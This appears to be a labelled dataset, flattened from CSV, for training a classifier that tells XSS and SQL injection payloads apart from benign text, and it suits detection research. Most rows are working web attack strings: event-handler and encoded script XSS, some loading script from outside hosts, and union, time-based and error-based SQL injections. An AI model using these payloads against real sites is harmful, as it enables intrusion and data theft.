sunrise?,3,normal,23867 She deleted the old files.,3,normal,22997 <details onfocusout=alert(1) tabindex=1 id=x></details><input autofocus>,1,XSS,2369 "First, the largest size that I could select was size 12.",3,normal,26193 "<IMG SRC=""mocha:[code]"">",1,XSS,9724 "1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'gxpr' = 'gxpr",2,SQLi,13952 1' ) where 6842 = 6842,2,SQLi,21490 1%' ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,16848 "select * from generate_series ( 7724,7724,case when ( 7724 = 8170 ) then 1 else 0 end ) limit 1--",2,SQLi,14330 "1%"" ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16166 "Wagers, meanwhile, was helping Chief O'Toole to select his replacement.",3,normal,25184 Select enhance.,3,normal,24622 "1 ) where 5464 = 5464 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12908 "select count ( * ) from generate_series ( 1,5000000 ) and ( 'tnvm' like 'tnvm",2,SQLi,15425 "It would be impossible to refer here even briefly to all these, and it may be more useful to select for somewhat full description,.",3,normal,25951 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--",2,SQLi,14334 if ( 9953 = 4347 ) select 9953 else drop function ocau--,2,SQLi,17632 "<style>@keyframes x{}</style><marquee style=""animation-name:x"" onanimationend=""alert(1)""></marquee>",1,XSS,1492 "-->'""/></sCript><deTailS open x="">"" ontoggle=(co\u006efirm)``>",1,XSS,3249 "<image oncontextmenu=""alert(1)"">test</image>",1,XSS,6852 1'|| ( select 'fwph' where 3791 = 3791,2,SQLi,19675 "<style>@keyframes x{}</style><frameset style=""animation-name:x"" onanimationend=""alert(1)""></frameset>",1,XSS,1427 "-5078 union all select 9708,9708--",2,SQLi,20153 Select whiskey.,3,normal,24517 "<meta http-equiv=""refresh"" content=""0;javascript&colon;alert(1)""/>?",1,XSS,2693 "1%' ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19296 1'|| ( select 'abjv' from dual where 4200 = 4200,2,SQLi,18786 "1"" ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ""owzc"" like ""owzc",2,SQLi,10465 One way of having a higher income is to initially select a With profits annuity.,3,normal,25827 Update plans.,3,normal,23036 <del id=x tabindex=1 onfocus=alert(1)></del>,1,XSS,6846 ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,16646 "1%' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and '%' = '",2,SQLi,13109 "1%"" ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15032 "<map onmouseout=""alert(1)"">test</map>",1,XSS,8575 <script>parent['alert'](1)</script>,1,XSS,9151 "1, ( convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4932 = 4932 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) )",2,SQLi,10837 Where's the perfect place to do some stargazing?,3,normal,23868 <svg><rp onload=alert(1)></rp>,1,XSS,9555 "<details onbeforecut=""alert(1)"" contenteditable>test</details>",1,XSS,3198 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3#",2,SQLi,14524 "<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>",1,XSS,488 "select * from users where id = 1 + \+*\ union select null,@@VERSION -- 1",2,SQLi,15932 "<style>@keyframes slidein {}</style><param style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></param>",1,XSS,372 "<style>:target {color: red;}</style><article id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></article>",1,XSS,785 "<dt oncut=""alert(1)"" contenteditable>test</dt>",1,XSS,6384 Apple's CarPlay is coming to select vehicles from Toyota and Lexus.,3,normal,26362 "or ""-",2,SQLi,22540 "1"" ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( ""awyk"" like ""awyk",2,SQLi,16706 "1"" or elt ( 6272 = 6272,sleep ( 5 ) ) and ""hvic"" like ""hvic",2,SQLi,17281 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--",2,SQLi,16553 <content id=x tabindex=1 ondeactivate=alert(1)></content><input id=y autofocus>,1,XSS,2049 "><script+src=https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487""></script>",1,XSS,106 1' ) ) ) and 5615 = 5458--,2,SQLi,20965 "1"" ) ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13290 "<xmp onpaste=""alert(1)"" contenteditable>test</xmp>",1,XSS,5686 "<blink draggable=""true"" ondragstart=""alert(1)"">test</blink>",1,XSS,3634 "1"" ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ""chvi"" like ""chvi",2,SQLi,16517 "1 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) # hlrg",2,SQLi,13113 """),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,15917 "-6254%' ) ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11680 "1"" and 4595 = 4595#",2,SQLi,21979 select * from users where id = 1. <@ or 1 = 1 -- 1,2,SQLi,18425 "1"" where 5440 = 5440 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12687 "<style>:target {transform: rotate(180deg);}</style><dfn id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></dfn>",1,XSS,671 -3436 ) or 9281 = 3172,2,SQLi,21439 Steve Grasso was a buyer of the Utilities Select SPDR Fund.,3,normal,25524 waitfor delay '0:0:5' and ( ( 'nvqf' = 'nvqf,2,SQLi,19086 As a Registered User you will be able to select to receive automatic e-mails when new content is posted within any of these sections.,3,normal,26359 "1' ) as rqzz where 4987 = 4987 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11658 "<style>:target {color:red;}</style><a id=x style=""transition:color 1s"" ontransitionend=alert(1)></a>",1,XSS,1441 "1'+ ( select sfmz where 4870 = 4870 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11063 Select a domain name service provider or registrar.,3,normal,25666 "-7233"" ) where 7574 = 7574 or 5821 = 3288",2,SQLi,19365 "<canvas oncut=""alert(1)"" contenteditable>test</canvas>",1,XSS,4813 "<IMG SRC=x onpopstate=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3260 "-4869%' union all select 5729,5729,5729--",2,SQLi,19431 "-5204"" ) union all select 7186,7186,7186--",2,SQLi,19263 "1"" where 5796 = 5796 and sleep ( 5 ) #",2,SQLi,19695 "{""id"":null,""name"":""instrument necessary""}",3,normal,27380 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and 'yfvu' like 'yfvu,2,SQLi,16081 "In some districts he may not marry into his own village, or into his mother's tribe; in others he may select a wife from certain tribes only.",3,normal,26004 1script3document.vulnerable=true;1/script3,1,XSS,7335 "<audio controls autoplay onended=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,1566 "iif ( 6307 = 2459,1,1/0 )",2,SQLi,21120 "-8258"" ) ) as swjp where 2681 = 2681 union all select 2681,2681,2681,2681,2681,2681--",2,SQLi,14946 "1"" ) where 4905 = 4905 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11784 "1"" ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ""auyv"" = ""auyv",2,SQLi,9989 "1' ) ) and make_set ( 8245 = 9872,9872 ) and ( ( 'kzgt' = 'kzgt",2,SQLi,16829 "You can choose the color of the paper and/or envelope, and you can also select the particular wording as well.",3,normal,25100 "1%"" and elt ( 4249 = 4249,7259 ) and ""%"" = """,2,SQLi,19094 "-8053"" where 5458 = 5458 or 9323 = 9323#",2,SQLi,19490 "1"" ) ) as rign where 1604 = 1604 and 3661 = 3054--",2,SQLi,18480 "{""id"":null,""name"":""Meganium""}",3,normal,26755 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22",2,SQLi,14198 "<textarea onkeypress=""alert(1)"" contenteditable>test</textarea>",1,XSS,3005 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'gtcb' = 'gtcb",2,SQLi,12002 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i",2,SQLi,11740 <figcaption onpointermove=alert(1)>XSS</figcaption>,1,XSS,5391 "1' ) ) as fjbe where 4662 = 4662 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12079 /**/or/**/1/**/ = /**/1,2,SQLi,21276 "<xml id=""xss"" src=""%(htc)s""></xml> <label dataformatas=""html"" datasrc=""#xss"" datafld=""payload""></label>",1,XSS,1311 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--",2,SQLi,11369 "1' ) where 9091 = 9091 union all select null,null,null,null#",2,SQLi,17197 Select ingredients.,3,normal,24495 "many beneficiaries, not just a select few.",3,normal,25898 -6015%' ) order by 1--,2,SQLi,21466 <ul id=x tabindex=1 onbeforedeactivate=alert(1)></ul><input autofocus>,1,XSS,2516 "1' ) where 7279 = 7279 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12601 Merge the project teams.,3,normal,22730 select ( case when ( 5914 = 2314 ) then 5914 else 1/ ( select 0 ) end ) --,2,SQLi,15778 "select * from generate_series ( 2317,2317,case when ( 2317 = 9706 ) then 1 else 0 end ) limit 1--",2,SQLi,14269 "iif ( 9134 = 5736,1,1/0 )",2,SQLi,21161 <q onpointerleave=alert(1)>XSS</q>,1,XSS,9261 "Lulu & Georgia: Up to 70% off select items in semi-annual warehouse sale Macy's: Save on select bed and bath, furniture, cleaning and organizing, area rugs, window treatments, home décor and luggage.",3,normal,25906 "<rb onmousemove=""alert(1)"">test</rb>",1,XSS,8794 Select a recipe to cook for dinner.,3,normal,24078 -5708 where 3134 = 3134 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,12905 "1%"" ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""%"" = """,2,SQLi,11273 "d=""alert('');\"")"";",1,XSS,9780 1'|| ( select 'kitk' where 6311 = 6311,2,SQLi,19749 ( select 2527 from pg_sleep ( 5 ) ),2,SQLi,20067 "<span draggable=""true"" ondrag=""alert(1)"">test</span>",1,XSS,5259 select ( case when ( 5752 = 6036 ) then 1 else 5752* ( select 5752 from master..sysdatabases ) end ) --,2,SQLi,13956 -3088' or 6872 = 6872 and 'miwk' = 'miwk,2,SQLi,19462 "{""id"":null,""name"":""sat older paint frog""}",3,normal,27498 1' where 1652 = 1652 and sleep ( 5 ) #,2,SQLi,19741 Care should be taken in planting to select a spot somewhat elevated and well drained.,3,normal,26296 <caption id=x tabindex=1 onbeforeactivate=alert(1)></caption>,1,XSS,3303 Then scroll down to Viewing Restrictions and select a level.,3,normal,25349 "1"" ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12065 "<i onbeforecopy=""alert(1)"" contenteditable>test</i>",1,XSS,5408 "<style>:target {transform: rotate(180deg);}</style><h1 id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></h1>",1,XSS,714 <p id=x tabindex=1 onbeforeactivate=alert(1)></p>,1,XSS,5785 "<SCRIPT ""a='>'"" SRC=""httx://xss.rocks/xss.js""></SCRIPT>",1,XSS,4411 "1'+ ( select vvet where 5221 = 5221 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) +'",2,SQLi,11712 "<a onkeydown=""alert(1)"" contenteditable>test</a>",1,XSS,5922 Modify the security settings for your account.,3,normal,22929 "1"" where 9756 = 9756",2,SQLi,21820 "<rt draggable=""true"" ondragend=""alert(1)"">test</rt>",1,XSS,5413 Sheep and cattle given a free choice between perennial ryegrass and white clover tend to select a mixed diet with perhaps two thirds clover.,3,normal,25560 "1' ) ) ) and elt ( 2506 = 2383,2383 ) and ( ( ( 'bjrj' = 'bjrj",2,SQLi,16958 1'+ ( select 'mxlb' where 4900 = 4900,2,SQLi,19819 "<shadow onbeforepaste=""alert(1)"" contenteditable>test</shadow>",1,XSS,3243 "SLEEP(5)=""",2,SQLi,22428 -4208%' ) ) ) or 1133 = 9010--,2,SQLi,20650 "<xmp onmousedown=""alert(1)"">test</xmp>",1,XSS,8496 Select transport.,3,normal,24758 <iframe onload=alert(1)></iframe>,1,XSS,9324 -6310 or 6715 = 3399,2,SQLi,21772 "AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337",2,SQLi,19076 "<big onmouseover=""alert(1)"">test</big>",1,XSS,8447 "1' ) as jxqt where 4322 = 4322 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11133 select ( case when ( 8857 = 1512 ) then 8857 else 8857* ( select 8857 from mysql.db ) end ) #,2,SQLi,14535 "1"" ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ""rvub"" like ""rvub",2,SQLi,12255 Sort the color swatches.,3,normal,22726 [a](javascript:alert(document.domain&#41;),1,XSS,7295 <iframe id=x tabindex=1 onbeforeactivate=alert(1)></iframe>,1,XSS,3673 1' ) ) and 2006 = 2006,2,SQLi,21558 -4289' or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'agnc' like 'agnc,2,SQLi,10653 Select plan.,3,normal,24749 "-2263' ) where 7931 = 7931 union all select 7931,7931,7931--",2,SQLi,17212 "<rp onmousedown=""alert(1)"">test</rp>",1,XSS,8943 "-5700 where 4238 = 4238 union all select 4238,4238,4238#",2,SQLi,17617 1' ) ) as egsj where 3447 = 3447,2,SQLi,20271 Everyone can select.,3,normal,24463 "<progress onbeforecut=""alert(1)"" contenteditable>test</progress>",1,XSS,2936 "1%"" ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ""%"" = """,2,SQLi,10818 "-1620 ) ) union all select 6257,6257,6257,6257,6257,6257,6257,6257,6257,6257--",2,SQLi,15331 "<frame onkeydown=""alert(1)"" contenteditable>test</frame>",1,XSS,4313 "1%' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and '%' = '",2,SQLi,14715 "<header onmouseleave=""alert(1)"">test</header>",1,XSS,6600 "{""id"":null,""firstName"":""Alan"",""lastName"":""Meng"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26811 "1' ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( 'ngxz' = 'ngxz",2,SQLi,12513 Select your communication.,3,normal,24907 -4058 ) union all select 9184--,2,SQLi,20435 "-6803"" ) order by 1#",2,SQLi,21762 Let's choose a book for our reading group.,3,normal,23786 "select * from users where id = 1 union select 1<@$,version ( ) -- 1",2,SQLi,16464 "<footer draggable=""true"" ondragenter=""alert(1)"">test</footer>",1,XSS,3414 "-4032"" ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ""olox"" = ""olox",2,SQLi,10440 "<style>@keyframes slidein {}</style><time style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></time>",1,XSS,402 "<IMG SRC=x onhashchange=""alert(String.fromCharCode(88,83,83))"">",1,XSS,2988 "1"" ) where 2839 = 2839 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12788 "1%"" rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ""%"" = """,2,SQLi,16067 "1"" ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""gozk"" = ""gozk",2,SQLi,10275 "<marquee ondblclick=""alert(1)"">test</marquee>",1,XSS,6608 "{""id"":null,""firstName"":""Li"",""lastName"":""Er"",""address"":""10 Anson Road 11-18 International Plaza"",""city"":""654"",""telephone"":""6481170165""}",3,normal,26908 1' ) as sruz where 6318 = 6318,2,SQLi,20643 "-9871"" ) union all select 9082#",2,SQLi,20438 "1 ) where 5465 = 5465 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12688 <script <B>document.vulnerable=true;</script>,1,XSS,6557 "<li onmousedown=""alert(1)"">test</li>",1,XSS,8783 Index columns where necessary.,3,normal,23352 1 ) ) as bvij where 7913 = 7913,2,SQLi,20478 1 ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ),2,SQLi,10821 "<sub oncopy=""alert(1)"" contenteditable>test</sub>",1,XSS,5783 "1' ) as jwvp where 5231 = 5231 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12265 Where can I select a book for my book club?,3,normal,23958 "-3215"" ) union all select 4457,4457,4457,4457,4457#",2,SQLi,18294 datetime,3,normal,23202 <command onpointerup=alert(1)>XSS</command>,1,XSS,7236 "During deposition, Trump has admitted that he did not select instructors.",3,normal,26227 1'|| ( select 'ussi' where 8958 = 8958,2,SQLi,19729 "1"" ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11760 "<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></XML> <SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>",1,XSS,521 "&lt;SCRIPT =\""&gt;\"" SRC=\""http&#58;//ha&#46;ckers&#46;org/xss&#46;js\""&gt;&lt;/SCRIPT&gt;",1,XSS,1757 <nobr id=x tabindex=1 onbeforeactivate=alert(1)></nobr>,1,XSS,4510 Insert the form.,3,normal,22886 "1"" ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ""fpqh"" = ""fpqh",2,SQLi,12943 "1"" ) as kndn where 9314 = 9314",2,SQLi,20536 "select * from users where id = 1 or \<\. union select 1,@@VERSION -- 1",2,SQLi,16133 <source id=x tabindex=1 onfocusin=alert(1)></source>,1,XSS,5265 "<div draggable=""true"" contenteditable>drag me</div><font ondragover=alert(1) contenteditable>drop here</font>",1,XSS,1071 "-6550' ) where 1675 = 1675 union all select 1675,1675,1675,1675,1675,1675,1675--",2,SQLi,15208 "<font onmouseup=""alert(1)"">test</font>",1,XSS,8422 1%' ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,17487 AS INJECTX WHERE 1=1 AND 1=0#,2,SQLi,20667 "><script+src=http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1""></script>",1,XSS,667 "1"" where 1234 = 1234",2,SQLi,21766 "1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'aumk' like 'aumk",2,SQLi,13820 "He got the House to set up a select committee to prepare a schedule with the advice of the traders who would be affected; but the report of the committee was not received sufficiently early in the year to enable Parliament to pass upon it, and the project was abandoned.",3,normal,26124 Modi and his government do not have the courage to ban any of these Chinese apps. Indian citizens should ban Modi Govt's misconduct!!. Beware of shameless and selective deshbhakti!!!,3,normal,26495 "<style>@keyframes x{}</style><xss style=""animation-name:x"" onanimationend=""alert(1)""></xss>",1,XSS,1701 "1'+ ( select 'vfkl' where 1713 = 1713 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) ) +'",2,SQLi,12188 1' ) as xiqw where 8507 = 8507 rlike sleep ( 5 ) --,2,SQLi,18285 "{""id"":null,""firstName"":""Wailin"",""lastName"":""Yan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27011 Select the right filter for the photo.,3,normal,24226 "<big onkeypress=""alert(1)"" contenteditable>test</big>",1,XSS,4918 `'><script>\x21javascript:alert(1)</script>,1,XSS,7068 --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->,1,XSS,2981 1%' and ( 2439 = 2555 ) *2555 and '%' = ',2,SQLi,19388 "1%' and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13774 <;SCRIPT>;alert(';XSS';)<;/SCRIPT>;,1,XSS,8993 <center onpointerenter=alert(1)>XSS</center>,1,XSS,6864 <main onpointermove=alert(1)>XSS</main>,1,XSS,8171 1 ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,18493 "<sup onmouseleave=""alert(1)"">test</sup>",1,XSS,8131 Merge financial records for the annual report.,3,normal,22912 "-7065'+ ( select 'bdxr' where 1756 = 1756 union all select 1756,1756,1756,1756,1756,1756,1756,1756,1756,1756#",2,SQLi,13668 "( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( ( ""%"" = """,2,SQLi,16499 Where's your SQL handbook?,3,normal,23408 "<wbr onmouseover=""alert(1)"">test</wbr>",1,XSS,8387 "<font draggable=""true"" ondrag=""alert(1)"">test</font>",1,XSS,5248 "1 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) -- mtaq",2,SQLi,13488 "{""id"":null,""firstName"":""Eevee"",""lastName"":""Yeo"",""address"":""1 Robin Walk"",""city"":""519"",""telephone"":""3593733942""}",3,normal,26766 <blockquote id=x tabindex=1 onfocus=alert(1)></blockquote>,1,XSS,3898 "1"" ) ) as eglv where 7412 = 7412 union all select null#",2,SQLi,17757 "<style>@keyframes x{}</style><nav style=""animation-name:x"" onanimationend=""alert(1)""></nav>",1,XSS,1723 Let's decide where to go for a weekend adventure.,3,normal,23687 "<footer draggable=""true"" ondragend=""alert(1)"">test</footer>",1,XSS,3779 "-6733' ) where 4024 = 4024 union all select 4024,4024,4024,4024#",2,SQLi,16766 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--",2,SQLi,15234 "1%' ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,15746 or pg_sleep(__TIME__)--,2,SQLi,21261 "<meta onbeforecopy=""alert(1)"" contenteditable>test</meta>",1,XSS,4052 "Scroll down and select ""Redeem gift card or promo code.""",3,normal,25704 "1' ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 'tkcy' like 'tkcy",2,SQLi,12304 "1"" ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( ""text"" like ""text",2,SQLi,13918 "<span onmouseleave=""alert(1)"">test</span>",1,XSS,7708 "-5438"" ) union all select 3170,3170--",2,SQLi,19892 "-7329"" ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( ""borw"" like ""borw",2,SQLi,12253 "<center onmouseout=""alert(1)"">test</center>",1,XSS,7108 "<b draggable=""true"" ondrag=""alert(1)"">test</b>",1,XSS,6374 <iframe onpointerover=alert(1)>XSS</iframe>,1,XSS,7247 "1'|| ( select 'yrau' where 7860 = 7860 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) ) ||'",2,SQLi,11901 `'><script>\xE2\x80\xAFjavascript:alert(520)</script>,1,XSS,5064 "<IMG SRC=x ononline=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3604 1' or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and 'iwmy' = 'iwmy,2,SQLi,15788 "1'|| ( select 'xyft' from dual where 8250 = 8250 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) ) ||'",2,SQLi,11880 <strike onpointerup=alert(1)>XSS</strike>,1,XSS,7759 <input onauxclick=alert(1)>,1,XSS,9641 "-6108' ) union all select 2519,2519,2519,2519--",2,SQLi,18852 "-4615' ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( 'jipk' like 'jipk",2,SQLi,16436 -7164%' or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and '%' = ',2,SQLi,10459 1'+ ( select mfcd where 6757 = 6757 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) +',2,SQLi,10110 -4615' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) 